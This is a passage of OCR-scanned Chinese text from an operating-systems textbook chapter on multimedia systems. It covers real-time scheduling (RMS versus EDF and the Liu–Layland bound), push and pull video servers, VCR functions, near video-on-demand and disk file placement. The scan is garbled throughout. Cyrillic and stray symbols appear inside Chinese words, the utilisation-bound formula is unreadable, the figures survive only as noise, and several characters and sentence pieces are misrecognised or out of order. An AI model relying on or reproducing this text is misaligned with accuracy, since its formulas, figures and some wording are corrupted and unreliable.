Чи = 90 时 ，A 第 四 次 就 结 。A 的 最 终 时 限 与 当前 进程 相同 (18120120), 所 以 调度 程序 面临 抢占 与 否 
的 选择 。 如 前 所 述 ， 如 果 不 是 必要 最 好 不 要 抢占 ， 所 以 B3 被 允许 完成 。 

在 图 7-15 所 示 的 例子 中 ， 直到: = 150，CPU 都 是 100% 被 占用 的 。 然 而 ， 因为 CPU 只 有 97.5% 被 利用 ， 
所 以 最 终 将 会 出 现 间隙 。 由 于 所 有 开始 和 结束 时 间 都 是 5ms 的 倍数 ， 所 以 间隙 将 是 5ms。 为 了 获得 要 求 


278 #7 


的 2.5% 的 空间 时 间 ，5ms 的 间隙 必须 每 200ms 出 现 一 次 ， 这 就 是 间隙 为 什么 没有 在 图 7-15 中 出 现 的 原因 。 
一 个 有 趣 的 问题 是 RMS 为 什么 会 失败 。 根 本 上 ， 使 用 静态 优先 级 只 有 在 CPU 的 利用 率 不 太 高 的 时 候 
才能 工作 。Liu 和 Layland (1973) 证 明了 对 于 任何 周期 性 进程 系统 ， 如 果 


ў <m(2'"—1) 

“Р, 
那么 就 可 以 保证 RMS 工 作 。 对 于 m = 3, 4, 5, 10, 2041100, ЖКЖ 50.780, 0.757, 0.743, 
0.718、0.705 和 0.696。 随 着 mm 一 =, ЖЖЖ а 2。 换 名 话说 ，Liu 和 Layland 证 明了 ， 对 于 三 个 进 
程 ， 如 果 CPU 利 用 率 等 于 或 小 于 0.780， 那 么 RMS 总 是 可 以 工作 的 。 在 第 一 个 例子 中 ，CPU 利 用 率 为 
0.808 而 RMS 工 作 正常 ， 但 那 只 不 过 是 幸运 罢了 。 对 于 不 同 的 周期 和 运行 时 间 ， 利 用 率 为 0.808 很 可 能 会 
失败 。 在 第 二 个 例子 中 ，CPU 利 用 率 如 此 之 高 (0.975) ， 根 本 不 存在 RMS 能 够 工作 的 希望 。 

与 此 相对 照 ，EDF 对 于 任意 一 组 可 调度 的 进程 总 是 可 以 工作 的 ， 它 可 以 达到 100% 的 CPU 利用 率 ， 

付出 的 代价 是 更 为 复杂 的 算法 。 因 而 ， 在 一 个 实际 的 视频 服务 器 中 ， 如 果 CPU 利 用 率 低 于 RMS 限 度 ， 可 
以 使 用 RMS ， 否 则 ， 应 该 选择 EDF。 


7.6 多 媒体 文件 系统 范 型 

至 此 我 们 已 经 讨论 了 多 媒体 系统 中 的 进程 调度 ， 下 面 继续 我 们 的 研究 ， 看 一 看 多 媒体 文件 系统 。 这 
样 的 文件 系统 使 用 了 与 传统 文件 系统 不 同 的 范 型 。 我 们 首先 回顾 传统 的 文件 HO ， 然 后 将 注意 力 转向 多 
媒体 文件 服务 器 是 如 何 组 织 的 。 进 程 要 访问 一 个 文件 时 ， 首 先 要 发 出 open 系 统 调用 。 如 果 该 调用 成 功 ， 
则 调用 者 被 给 予 某 种 令 牌 以 便 在 未 来 的 调用 中 使 用 ， 该 令 牌 在 UNIX 中 被 称 为 文件 描述 符 ， 在 Windows 
中 被 称 为 句柄 。 这 时 ， 进 程 可 以 发 出 read 系 统 调 用 ， 提 供 令 牌 、 缓 冲 区 地 址 和 字 节 计数 作为 参数 。 操 作 
系统 则 在 缓冲 区 中 返回 请 求 的 数据 。 以 后 还 可 以 发 出 另外 的 read 调 用 ， 直 到 进程 结束 ， 在 进程 结束 时 它 
将 调用 close 以 关闭 文件 并 返回 其 资源 。 

由 于 实时 行为 的 需要 ， 这 一 模型 对 于 多 媒体 并 不 能 很 好 地 工作 。 在 显示 来 自 远程 视频 服务 器 的 多 媒 
体 文 件 时 ， 该 模型 的 工作 尤为 拙劣 。 第 一 个 问题 是 用 户 必须 以 相当 精确 的 时 间 间 隔 进行 read 调 用 。 第 二 
个 问题 是 视频 服务 器 必须 能 够 没有 延迟 地 提供 数据 块 ， 当 请 求 没有 计划 地 到 来 并 且 预 先 没有 保留 资源 时 ， 
做 到 这 一 点 是 十 分 困难 的 。 

为 解决 这 些 问题 ， 多 媒体 文件 服务 器 使 用 了 一 个 完全 不 同 的 范 型 : 像 录 像 机 (Video Cassette 
Recorder，VCR) 一 样 工 作 。 为 了 读 取 一 个 多 媒体 文件 ， 用 户 进程 发 出 start 系 统 调用 ， 指 定 要 读 的 文件 
和 各 种 其 他 参数 ， 例 如 ， 要 使 用 哪些 音频 和 字幕 轨迹 。 接 着 ， 视 频 服务 器 开始 以 必要 的 速率 送出 帧 。 然 
后 用 户 进 程 以 帧 进来 的 速率 对 它们 进行 处 理 。 如 果 用 户 对 所 看 的 电影 感到 厌烦 ， 那 么 发 出 stop 系 统 调用 
可 以 将 数据 流 终止 。 具 有 这 种 数据 流 模 型 的 文件 服务 器 通常 被 称 为 推送 型 服务 器 (Push server), HAE 
将 数据 推送 给 用 户 ， 与 此 相对 照 的 是 传统 的 拉 到 型 服务 器 (pull server)， 用 户 不 得 不 通过 重复 地 调用 
read 一 块 接 一 块 地 取得 数据 ， 每 调用 一 次 可 以 拉 取 出 一 块 数据 。 这 两 个 模型 之 间 的 区 别 如 图 7-16 所 示 。 
视频 服务 器 客户 视频 服务 器 A 客户 
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107-16 а) 拉 取 型 服务 器 ，b) 推送 型 服务 器 
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7.6.1 VCR 控 制 功 能 

大 多 数 视频 服务 器 也 实现 了 标准 的 VCR 控 制 功 能 ， 包 括 暂停 、 快 进 和 倒 带 。 暂 停 是 相当 简单 的 。 用 
户 发 送 一 个 消息 给 视频 服务 器 ， 告 诉 它 停止 。 视 频 服务 器 此 时 要 做 的 全 部 事情 是 记 住 下 一 次 要 送出 的 是 
哪 一 帧 。 当 用 户 要 求 服务 器 恢复 播放 时 ， 服 务 器 只 要 从 它 停止 的 地 方 继续 就 可 以 了 。 

然而 ， 这 里 存在 着 一 个 复杂 因素 。 为 了 获得 可 接受 的 性 能 ， 服 务 器 应 该 为 每 个 流出 的 数据 流 保留 诸 
如 磁盘 带宽 和 内 存 缓冲 区 等 资源 。 当 电影 暂停 时 继续 占用 这 些 资源 将 造成 浪费 ， 特 别 是 如 果 用 户 打算 到 
厨房 中 找到 一 块 冷冻 的 比萨 饼 (或 许 是 特大 号 的 )、 用 微波 炉 亮 调 并 且 美 餐 一 顿 的 时 候 。 当 然 ， 在 暂停 
的 时 候 可 以 很 容易 地 将 资源 释放 ， 但 是 这 引入 了 风险 ， 当 用 户 试图 恢复 播放 的 时 候 ， 有 可 能 无 法 重新 获 
得 这 些 资 源 。 

真正 的 倒 带 实际 上 非常 简单 ， 没 有 任何 复杂 性 。 服务 器 要 做 的 全 部 事情 是 注意 到 下 一 次 要 送出 的 帧 
是 第 0 帧 。 还 有 比 这 更 容易 的 吗 ? 然而 ， 快 进 和 快 倒 (也 就 是 在 倒 带 的 同时 播放 ) 就 难处 理 多 了 。 如 果 
没有 压缩 ， 那 么 以 10 倍 的 速度 前 进 的 一 种 方法 是 每 10 帧 只 显示 一 帧 ， 以 20 倍 的 速度 前 进 则 要 求 每 20 帧 显 
示 一 帧 。 实 际 上 ， 在 不 存在 压缩 的 情况 下 ， 以 任意 速度 前 进 和 后 退 都 是 十 分 容易 的 。 要 以 正常 速度 的 k 
倍 运行 ， 只 要 每 k 帧 显示 一 帧 就 可 以 了 。 要 以 正常 速度 的 k 倍 后 退 ， 只 要 沿 另 一 个 方向 做 相同 的 事情 就 可 
以 了 。 这 一 方法 在 推送 型 服务 器 和 拉 取 型 服务 器 上 工作 得 同样 好 。 

压缩 则 使 快 进 和 快 倒 复杂 起 来 。 对 于 便携 式 摄像 机 的 DV 磁 带 ， 由 于 其 每 一 帧 都 是 独立 于 其 他 帧 而 
压缩 的 ， 所 以 只 要 能 够 快速 地 找到 所 需要 的 帧 ， 使 用 这 一 策略 还 是 有 可 能 的 。 由 于 视 其 内 容 不 同 每 一 帧 
的 压缩 量 也 有 所 不 同 ， 所 以 每 一 帧 具有 不 同 的 大 小 ， 因而 在 文件 中 向 前 跳 过 k 帧 并 不 能 通过 数字 计算 来 
完成 。 此 外 ， 音 频 压 缩 是 独立 于 视频 压缩 的 ， 所 以 对 于 在 高 速 模式 中 显示 的 每 一 视频 帧 ， 还 必须 找到 正 
确 的 音频 帧 (除非 在 高 于 正常 速度 播放 时 将 声音 关闭 )。 因 此 ， 对 一 个 DV 文件 进行 快 进 操作 需要 有 一 个 
索引 ， 该 索引 可 以 使 帧 的 查找 快速 地 实现 ， 但 是 至 少 在 理论 上 这 样 做 是 可 行 的 。 

对 于 MPEG， 由 于 使 用 ! 帧 、P 帧 和 B 帧 ， 这 一 方案 即使 在 理论 上 也 是 不 能 工作 的 。 向 前 跳 过 k 帧 (就 
算 假设 能 这 样 做 ) 可 能 落 在 一 个 P 帧 上 ， 而 这 个 P 帧 则 基于 刚刚 跳 过 的 一 个 I 帧 。 没 有 基本 帧 ， 只 有 从 基 
本 帧 发 生 的 增 量变 化 (这 正 是 P 帧 所 包含 的 ) 是 无 用 的 。 MPEG 要 求 按 顺序 播放 文件 。 

攻克 这 一 难题 的 另 一 个 方法 是 实际 尝试 以 10 倍 的 速度 顺序 地 播放 文件 。 然 而 ， 这 样 做 就 要 求 以 10 倍 
的 速度 将 数据 拉 出 磁盘 。 此 时 ， 服 务 器 可 能 试图 将 帧 解压 缩 (这 是 正常 情况 下 服务 器 不 需要 做 的 事情 )， 
判定 需要 哪 一 帧 ， 然 后 每 隔 10 帧 重新 压缩 成 一 个 I 帧 。 然 而 ， 这 样 做 给 服务 器 增加 了 沉重 的 负担 。 这 一 
方法 还 要 求 服务 器 了 解压 缩 格 式 ， 正 常情 况 下 服务 器 不 必 了 解 这 些 东西 。 

作为 替代 ， 可 以 通过 网 络 实际 发 送 所 有 的 数据 给 用 户 ， 并 在 用 户 端 选 出 正确 的 帧 ， 这 样 做 就 要 求 网 
络 以 10 倍 的 速度 运行 ， 这 或 许 是 可 行 的 ， 但 是 在 这 么 高 的 速度 下 正常 操作 肯定 不 是 一 件 容易 的 事情 。 

总 而 言 之 ， 不 存在 容易 的 方法 。 惟 一 可 行 的 策略 要 求 预先 规划 。 可 以 做 的 事情 是 建立 一 个 特殊 的 文 
件 ， 包 含 每 隔 10 帧 中 的 一 帧 ， 并 且 将 该 文件 以 通常 的 MPEG 算 法 进行 压缩 。 这 个 文件 正 是 在 图 7-3 中 注 为 
“ 快 进 ” 的 那个 文件 。 要 切换 到 快 进 模式 ， 服务 器 必须 判定 在 快 进 文件 中 用 户 当前 所 在 的 位 置 。 例 如 ， 
如 果 当 前 帧 是 48 210 并 且 快 进 文件 以 10 倍 的 速度 运行 ， 那么 服务 器 在 快 进 文件 中 必须 定位 到 4821 帧 并 且 
在 此 处 以 正常 速度 开始 播放 。 当 然 ， 这 一 帧 可 能 是 P 帧 或 B 帧 ， 但 是 客户 端的 解码 进程 可 以 简单 地 跳 过 若 
干 帧 直到 看 见 一 个 1 帧 。 利 用 特别 准备 的 快 倒 文件， 可 以 用 类 似 的 方法 实现 快 倒 。 

当 用 户 切换 回 到 正常 速度 时 ， 必 须 使 用 相反 的 技巧 。 如 果 在 快 进 文件 中 当前 帧 是 5734， 服 务 器 只 要 
切换 回 到 常规 文件 并 且 从 57 340 帧 处 继续 播放 。 同 样 ， 如 果 这 一 帧 不 是 一 个 ! 帧 ， 客 户 端的 解码 进程 必须 
忽略 所 有 的 帧 直到 看 见 一 个 [ 帧 。 

尽管 有 了 这 两 个 额外 的 文件 可 以 做 这 些 工作 ， 这 一 方案 还 是 有 某 些 
盘 空 间 来 存放 额外 的 文件 。 其 次 ， 快 进 和 倒 带 只 能 以 对 应 于 特别 文件 的 
快 进 文件 和 快 倒 文 件 之 间 来 回 切换 需要 额外 的 复杂 算法 。 

7.6.2 近似 视频 点 播 

有 k 个 用 户 取得 相同 的 电影 和 这 些 用 户 取得 k 部 不 同 的 电影 在 本 质 上 给 服务 器 施加 了 相同 的 工作 量 。 

然而 ， 通 过 对 模型 做 一 个 小 小 的 修改 ， 就 可 能 获得 巨大 的 性 能 改进 。 视频 点 播 面临 的 问题 是 用 户 可 能 在 


首先 ， 需 要 某 些 额外 的 磁 
进行 。 第 三 ， 在 常规 文件 、 
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任意 时 刻 开 始 观看 一 部 电影 ， 所 以 ， 如 果 有 100 个 用 户 全 部 在 晚 8 点 左右 开始 观看 某 个 新 电影 ， 很 可 能 不 
会 有 两 个 用 户 在 完全 相同 的 时 刻 开始 ， 所 以 他 们 无 法 共享 一 个 数据 流 。 使 优化 成 为 可 能 的 修改 是 ， 通 知 
所 有 用 户 电影 只 在 整 点 和 随后 每 隔 (例如 ) 5 分 钟 开始 。 因 此 ， 如 果 一 个 用 户 想 在 8:02 看 一 部 电影 ， 那 
么 他 必须 等 到 8:05 。 

这 样 做 的 收益 是 ， 不 管 存在 多 少 客户 ， 对 于 一 部 2 小 时 的 电影 ， 只 需要 24 个 数据 流 。 如 图 7-17 所 示 ， 
第 一 个 数据 流 开始 于 8:00。 在 8:05， 当 第 一 个 数据 流 处 于 第 9000 帧 时 ， 第 二 个 数据 流 开 始 。 在 8:10， 当 
第 一 个 数据 流 处 于 第 18 000 帧 并 且 第 二 个 数据 流 处 于 第 9000 帧 时 ， 第 三 个 数据 流 开 始 ， 以 此 类 推 直到 第 
24 个 数据 流 开 始 于 9:55。 在 10:00， 第 一 个 数据 流 终止 并 且 再 一 次 从 第 0 帧 开始 。 这 一 方案 称 为 近似 视频 
Hdt (near video оп demand) ， 因 为 视频 并 不 是 完全 随 着 点 播 而 开始 ， 而 是 在 点 播 之 后 不 久 开始 。 

数据 流 


1 Co (990) [ооо] (27000) (eooo) [5боо] [59000] (5з000] [72000] E1000) 
2 CD [жо] [18000] 区 四 [55000] 区 四 [59000] (89000) [72000 
(57) [эооо} [твооо] [27000] [55000] [5000] [50000] 区 下 
[e] [зоо] [твооо] 区 om Eco [45000] [54000] 
CO mg 

第 3 个 数据 流 中 


的 第 9000 帧 在 са 
8:20 送 出 


о = з оч ь w 


воо sos вю 815 во 825 830 835 


时 间 一 一 
图 7-17 近似 视频 点 播 以 规则 的 间隔 开始 一 个 新 的 数据 流 ， 在 本 例 中 时 间 间 隔 为 5 分 钟 (9000 帧 ) 


这 里 的 关键 参数 是 多 长 时 间 开 始 一 个 数据 流 。 如 果 每 2 分 钟 开始 一 个 数据 流 ， 那 么 对 于 一 部 2 小 时 的 
电影 来 说 就 需要 60 个 数据 流 ， 但 是 开始 观看 的 最 大 等 待 时 间 是 2 分 钟 。 运 营 商 必须 判定 人 们 愿意 等 待 多 
长 时 间 ， 因 为 人 们 愿意 等 待 的 时 间 越 长 ， 系 统 效率 就 越 高 ， 并 且 同 时 能 够 被 观看 的 电影 就 越 多 。 一 个 赫 
代 的 策略 是 同时 提供 不 用 等 待 的 选择 权 ， 在 这 种 情况 下 ， 新 的 数据 流 可 以 立刻 开始 ， 但 是 需要 对 系统 做 
更 多 的 修改 以 支持 即时 启动 。 

在 某 种 意义 上 ， 视 频 点 播 如 同 使 用 出 租车 : 一 招手 它 就 来 。 近 似 视频 点 播 如 同 使 用 公共 汽车 ， 它 有 
着 固定 的 时 刻 表 ， 乘 客 必须 等 待 下 一 辆 。 但 是 大 众 交通 只 有 在 存在 大 众 的 时 候 才 有 意义 。 在 曼哈顿 中 心 
区 ， 每 5 分 钟 一 辆 的 公共 汽车 加 起 来 至 少 还 可 以 拉 上 一 些 乘客 ， 而 在 怀俄明 州 乡间 公路 上 旅行 的 公共 汽 
车 ， 可 能 在 所 有 的 时 间 几 乎 都 是 空 室 的 。 类 似 地 ， 播 放 史 蒂 文 斯 皮尔 伯 格 的 最 新 大 片 可 能 吸引 足够 多 
的 客户 ， 从 而 保证 每 5 分 钟 开 始 一 个 新 的 数据 流 ， 但 是 对 于 《乱世 佳人 》 这 样 的 经 典 影片 ， 最 好 还 是 简 
单 地 在 点 播 的 基础 上 播映 。 

对 于 近似 视频 点 播 ， 用 户 不 具有 VCR 控 制 能 力 。 没 有 用 户 能 够 暂停 一 部 电影 而 去 一 趟 厨房 。 他 们 所 
能 做 的 最 好 的 事情 不 过 是 当 他 们 从 厨房 中 返回 时 ， 向 后 退 到 随后 开始 的 一 个 数据 流 ， 从 而 使 漏 过 的 几 分 
钟 资料 重 现 。 

实际 上 ， 近 似 视频 点 播 还 有 另外 一 个 模型 。 在 这 个 模型 中 ， 人 们 可 以 在 他 们 需要 的 任意 时 候 预 订 电 
影 ， 而 不 是 预先 宜 布 每 隔 5 分 钟 将 开演 某 部 电影 。 每 隔 5 分 钟 ， 系 统 要 查看 哪些 电影 已 经 被 预订 并 且 开始 
这 些 电影 。 采 用 这 一 方案 时 ， 根 据点 播 的 情况 ， 一 部 电影 可 能 在 8:00、8:10、8:15 和 8:25 开 始 ， 但 不 会 
在 中 间 的 时 间 开 始 。 结 果 ， 没 有 观众 的 数据 流 就 不 会 被 传输 ， 节 约 了 磁盘 带宽 、 内 存 和 网 络 容量 。 另 一 
方面 ， 现 在 到 厨房 去 制作 冰淇淋 就 有 点 冒险 ， 因 为 不 能 保证 在 观众 正在 观看 的 电影 之 后 5 分 钟 还 有 另 一 
个 数据 流 正在 运行 。 当 然 ， 运 营 商 可 以 给 用 户 提供 一 个 选项 ， 以 便 显示 所 有 同时 发 生 的 数据 流 的 一 个 列 
表 ， 但 是 大 多 数 人 觉得 他 们 的 电视 机 蜗 控 器 按钮 已 经 太 多 ， 不 大 可 能 会 热情 地 欢迎 更 多 的 几 个 按钮 。 
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7.6.3 具有 VCR 功 能 的 近似 视频 点 播 

将 近似 视频 点 播 (为 的 是 效率 ) 加 上 每 个 个 体 观众 完全 的 VCR 控 制 (为 的 是 方便 用 户 ) 是 一 种 理想 
的 组 合 。 通 过 对 模型 进行 略微 的 修正 ， 这 样 的 设计 是 有 可 能 的 。 下 面 我 们 将 介绍 为 达到 这 一 目标 所 采用 
的 一 种 方法 (Abram-Profeta 和 Shin, 1998) ， 我 们 给 出 的 是 略微 简化 了 的 描述 。 

我 们 将 以 图 7-17 所 示 的 标准 近似 视频 点 播 模式 为 开端 。 可 是 ， 我 们 要 增加 要 求 ， 即 要 求 每 个 客户 机 在 
本 地 缓冲 前 AT 分 钟 以 及 即将 来 临 的 AT 分钟 。 缓 冲 前 AT 分 钟 是 十 分 容易 的 ， 只 要 在 显示 之 后 将 其 保存 下 来 即 
可 。 缓 钟 即将 来 临 的 AT 分 钟 是 比较 困难 的 ， 但 是 如 果 客 户 机 有 一 次 读 两 个 数据 流 的 能 力也 是 可 以 实现 的 。 

可 以 用 一 个 例子 来 说 明 建立 缓冲 区 的 一 种 方法 。 如 果 一 个 用 户 在 8:15 开 始 观看 电影 ， 那么 客户 机 读 
人 并 显示 8:15 的 数据 流 (该 数据 流 正 处 于 第 0 帧 )。 与 此 并 行 ， 客户 机 读 入 并 保存 8:10 的 数据 流 ， 该 数据 
流 当前 正 处 于 5 分 钟 的 标记 处 (也 就 是 第 9000 帧 ) 。 在 8:20 时 ， 第 0 帧 至 第 17 999 帧 已 经 被 保存 下 来 ， 并 且 
用 户 下 面 将 要 看 到 的 应 该 是 第 9000 帧 。 从 此 刻 开始 ，8:15 的 数据 流 被 放弃 ， 缓冲 区 用 8:10 的 数据 流 (该 
数据 流 正 处 于 第 18 000 帧 ) 来 填充 ， 而 显示 则 从 缓冲 区 的 中 间 点 第 9000 帧 ) 驱动 。 当 每 一 新 的 帧 被 读 
和 时 ， 在 缓冲 区 的 终点 处 添加 一 帧 ， 而 在 缓冲 区 的 起 点 处 丢弃 -- 帧 。 当前 被 显示 的 帧 称 为 播放 点 (play 
point)， 它 总 是 处 于 缓冲 区 的 中 间 : 图 7-18a 所 示 为 电影 播放 到 第 75 分 钟 时 的 情形 。 此 时 ，70 分 钟 到 80 
分 钟 之 间 所 有 的 帧 都 在 缓冲 区 中 。 如 果 数 据 率 是 4 Mbps， 则 10 分 钟 的 缓冲 区 需要 300M 字 节 的 存储 容量 。 
以 目前 的 价格 ， 这 样 的 缓冲 区 肯定 可 以 在 磁盘 中 保持 ， 并 且 在 RAM 中 保持 也 是 可 能 的 。 如 果 希 望 使 用 
RAM， 但 是 300M 字 节 又 太 大， 那么 可 以 使 用 小 一 些 的 缓冲 区 。 


播放 点 在 第 75 分 钟 
分 钟 0 ю є Ге 
， ШГ 


放 点 在 第 12 分 
г 在 第 12 分 钟 


120 


b) 


播放 点 在 第 15 分 钟 
» 


应 播放 点 在 第 16 分 钟 


„Сг 


播放 点 在 第 22 分 名 


е) 


图 7-18 а) 初始 情形 ，b) 倒 带 至 12 分 钟 之 后 ，c) 等 待 3 分 钟 之 后 ，d) 开始 重 填充 缓冲 区 之 后 ，e) 缓冲 区 满 


现在 假设 用 户 决定 要 快 进 或 者 快 倒 。 只 要 播放 点 保持 在 70 到 80 分 钟 的 范围 之 内 ， 显 示 就 可 以 从 缓冲 
区 馈 和 人 。 然 而， 如 果 播 放 点 在 某 个 方向 离开 了 这 一 区 间 ， 我 们 就 遇 到 了 问题 。 解 决 方法 是 开启 一 个 私有 
(也 就 是 视频 点 播 ) 数据 流 以 服务 于 用 户 。 沿 着 某 个 方向 快速 运动 可 以 用 前 面 讨论 过 的 技术 来 处 理 。 

通常 ， 在 某 一 时 刻 用 户 可 能 会 安 下 心 来 决定 再 次 以 正常 速度 观看 电影 。 此 时 ， 我 们 可 以 考虑 将 用 户 
迁移 到 某 一 近似 视频 点 播 数据 流 ， 这 样 私 有 数据 流 就 可 以 被 放弃 。 例 如 ， 假设 用 户 决定 返回 到 12 分 钟 标 
号 处 ， 如 图 7-18b 所 示 。 这 一 点 远 远 超出 了 缓冲 区 的 范围 ， 所 以 显示 不 可 能 从 缓冲 区 馈 入 。 此 外 ， 由 于 
切换 (立刻 ) 发生 在 第 75 分 钟 ， 系 统 中 存在 着 正在 显示 电影 第 5、10、 15 和 20 分 钟 那 一 帧 的 数据 流 ， 但 
是 没有 显示 电影 第 12 分 钟 那 一 帧 的 数据 流 。 

解决 方法 是 继续 观看 私有 数据 流 , 但 是 开始 从 当前 正 播放 电影 第 15 分 钟 那 一 帧 的 数据 流 填充 缓冲 区 。 
经 过 3 分 钟 之 后 的 情形 如 图 7-18c 所 示 。 播 放 点 现在 是 第 15 分 钟 ， 缓冲 区 包含 了 15 到 18 分 钟 的 帧 ， 而 近似 
视频 点 播 数据 流 正 处 在 第 8、13、18 和 23 分 钟 。 在 这 一 时 刻 ， 私有 数据 流 可 以 被 放弃 ， 显 示 可 以 从 缓冲 
区 馈 人 。 缓 冲 区 继续 从 现在 正 处 于 第 18 分 钟 的 数据 流 填充 。 经 过 另 一 分 钟 之 后 ， 播 放 点 是 第 16 分 钟 ， 缓 
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冲 区 包含 了 15 到 19 分 钟 的 帧 ， 并 且 数 据 流 在 第 19 分 钟 处 将 数据 馈 人 缓冲 区 ， 如 图 7-18d 所 示 。 
经 过 另外 6 分 钟 之 后 ， 缓 冲 区 变 满 ， 并 且 播放 点 是 在 第 22 分 钟 。 播 放 点 不 是 处 于 缓冲 区 的 中 间 点 ， 
但 是 如 果 必 要 可 以 进行 这 样 的 整理 。 


7.7 文件 存放 

多 媒体 文件 非常 庞大 ， 通 常 只 写 一 次 而 读 许多 次 ， 并 且 倾 向 于 被 顺序 访问 。 它 们 的 回放 还 必须 满足 
严格 的 服务 质量 标准 。 总 而 言 之 ， 这 些 要 求 暗 示 着 不 同 于 传统 操作 系统 使 用 的 文件 系统 布局 。 我 们 在 下 
面 将 讨论 某 些 这 样 的 问题 ， 首 先 针对 单个 磁盘 ， 然 后 是 多 个 磁盘 。 
7.7.1 在 单个 磁盘 上 存放 文件 

最 为 重要 的 要 求 是 数据 能 够 以 必要 的 速度 流出 到 网 络 或 输出 设备 上 ， 并 且 没 有 颇 动 。 为 此 ， 在 传输 
一 帧 的 过 程 中 有 多 次 寻 道 是 极度 不 受 欢迎 的 。 在 视频 服务 器 上 消除 文件 内 寻 道 的 一 种 方法 是 使 用 连续 的 
文件 。 通 常 ， 使 文件 为 连续 的 工作 做 得 并 不 十 分 好 ， 但 是 在 预先 精心 装载 了 电影 的 视频 服务 器 上 它 工作 
得 还 是 不 错 的 ， 因 为 这 些 电影 后 来 不 会 再 发 生变 化 。 

然而 ， 视频、 音频 和 文本 的 存在 是 一 个 复杂 因素 ， 如 图 7-3 所 示 。 即 使 视频 、 音 频 和 文本 每 个 都 存 
储 为 单独 的 连续 文件 ， 从 视频 文件 到 音频 文件 ， 再 从 音频 文件 到 文本 文件 的 寻 道 在 需要 的 时 候 还 是 免 不 
了 的 。 这 使 人 想起 第 二 种 可 能 的 存储 排列 ， 使 视频 、 音 频 和 文本 交叉 存放 ， 但 是 整个 文件 还 是 连续 的 ， 
如 图 7-19 所 示 。 此 处 ， 直 接 跟随 第 1 帧 视频 的 是 第 1 帧 的 各 种 音频 轨迹 ， 然 后 是 第 1 帧 的 各 种 文本 轨迹 。 
根据 存在 多 少 音频 和 文本 轨迹 ， 最 简单 的 可 能 是 在 一 次 磁盘 读 操作 中 读 和 每 一 帧 的 全 部 内 容 ， 然 后 只 将 
需要 的 部 分 传输 给 用 户 。 
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图 7-19 每 部 电影 在 一 个 连续 文件 中 交叉 存放 视频 、 音 频 和 文本 


这 一 组 织 需要 额外 的 磁盘 1/O 读 入 不 必要 的 音频 和 文本 ,在 内 存 中 还 需要 额外 的 缓冲 区 空间 存放 它们 。 
可 是 它 消除 了 所 有 的 寻 道 (在 单 用 户 系统 上 )， 并且 不 需要 任何 系统 开销 跟踪 哪 一 帧 在 磁盘 上 的 什么 地 方 ， 
因为 整 部 电影 存放 在 一 个 连续 文件 中 。 以 这 样 的 布局 ， 随 机 访问 是 不 可 能 的 ， 但 是 如 果 不 需 要 随机 访问 ， 
这 点 损失 并 不 严重 。 类 似 地 ， 如 里 没有 额外 的 数据 结构 和 复杂 性 ， 快 进 和 快 侧 也 是 不 可 能 的 。 

在 具有 多 个 并 发 输出 流 的 视频 服务 器 上 ， 使 整 部 电影 成 为 一 个 连续 文件 的 优点 就 失去 了 ， 因 为 从 一 
部 电影 读 取 一 帧 之 后 ， 磁 盘 可 能 不 得 不 从 许多 其 他 电影 读 人 帧 ， 然 后 才能 返回 到 第 一 部 电影 。 同 样 ， 对 
于 一 部 电影 既 可 以 读 也 可 以 写 的 系统 (例如 用 于 视频 生产 或 编辑 的 系统 ) 来 说 ， 使 用 巨大 的 连续 文件 是 
很 困难 的 ， 因 而 也 是 没有 用 的 。 


772 两 个 痊 代 的 文件 组 织 策略 

这 些 考虑 导致 两 个 针对 多 媒体 文件 的 其 他 文件 存放 组 织 。 第 一 个 是 小 块 模型 ， 如 图 7-20a 所 示 。 在 
这 种 组 织 中 ， 选 定 磁盘 块 的 大 小 比 帧 的 平均 大 小 ， 黄 至 是 比 P 帧 和 B 帧 的 大 小 ， 要 小 得 多 。 对 于 每 秒 30 帧 
以 4 Mbps 速 率 传输 的 MPEG-2 而 言 ， 帧 的 平均 大 小 为 16KB， 所 以 一 个 磁盘 块 的 大 小 为 IKB 或 2KB 工 作 得 
比较 好 。 这 里 的 思想 是 每 部 电影 有 一 个 帧 索引 ， 这 是 一 个 数据 结构 ， 每 一 帧 有 一 个 帧 索引 项 ， 指 向 帧 的 
开始 。 每 一 帧 本 身 是 一 连 串 连续 的 块 ， 包 含 该 帧 所 有 的 视频 、 音 频 和 文本 轨迹 ， 如 图 7-20 中 所 示 。 这 样 ， 
读 第 k 帧 时 首先 要 在 帧 索引 中 找到 第 k 个 索引 项 ， 然 后 在 一 次 磁盘 操作 中 将 整个 帧 读 人 。 由 于 不 同 的 帧 具 
有 不 同 的 大 小 ， 所 以 在 帧 索引 中 需要 有 表示 帧 大 小 的 字段 (以 块 为 单位 )， 即 便 对 于 1KB 大 小 的 磁盘 块 ， 
8 位 的 字段 也 可 以 处 理 最 大 为 255KB 的 帧 ， 这 对 于 一 个 未 压缩 NTSC 帧 来 说 ， 就 算 它 有 许多 音频 轨迹 也 已 
经 足够 了 。 
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存放 电影 的 另 一 个 方法 是 使 用 大 磁盘 块 (比如 256KB) ， 并 且 在 每 一 块 中 放 入 多 个 帧 ， 如 图 7-20b 所 
示 。 这 里 仍然 需要 一 个 索引 ， 但 是 这 次 不 是 帧 索引 而 是 块 索 引 。 实 际 上 ， 该 索引 与 图 6-15 中 的 i 节 点 基本 
相同 ， 只 是 可 能 还 有 额外 的 信息 表明 哪 一 帧 处 于 每 一 块 的 开始 ， 这 样 就 有 可 能 快速 地 找到 指定 的 帧 。 
般 而 言 ， 一 个 磁盘 块 拥有 的 帧 的 数目 不 见得 是 整数 ， 所 以 需要 做 某 些 机 制 来 处 理 这 一 问题 。 解 决 这 一 问 
题 有 两 种 选择 。 


帧 索引 块 索引 
磁盘 块 大 小 小 于 磁盘 块 大 小 大 于 
帧 的 大 小 帧 的 大 小 
| { 
і] 0 
П ШШ 
DT 
Ш 音频 
文本 
四 | 二 
сш 
Ш 
а b, 


图 7-20 不 连续 的 电影 存储 a) 小 磁盘 块 ，b) 大 磁盘 块 


第 一 种 选择 如 图 7-20b 所 示 ， 当 下 一 帧 填 不 满 当前 磁盘 块 的 时 候 ， 则 磁盘 块 剩余 的 部 分 就 保持 空闲 
状态 。 这 一 浪费 的 空间 就 是 内 部 碎片 ， 与 具有 固定 大 小 页 面 的 虚拟 内 存 系统 中 的 内 部 碎片 相同 。 但 是 ， 
这 样 做 在 一 帧 的 中 间 决 不 需要 进行 寻 道 。 

另 一 种 选择 是 填充 每 一 磁盘 块 到 尽头 ， 将 帧 分 裂 开 使 其 路 越 磁盘 块 。 这 -选择 在 帧 的 中 间 引 入 寻 道 
的 需要 ， 这 将 损害 性 能 ， 但 是 由 于 消除 了 内 部 碎片 而 节约 了 磁盘 空间 。 

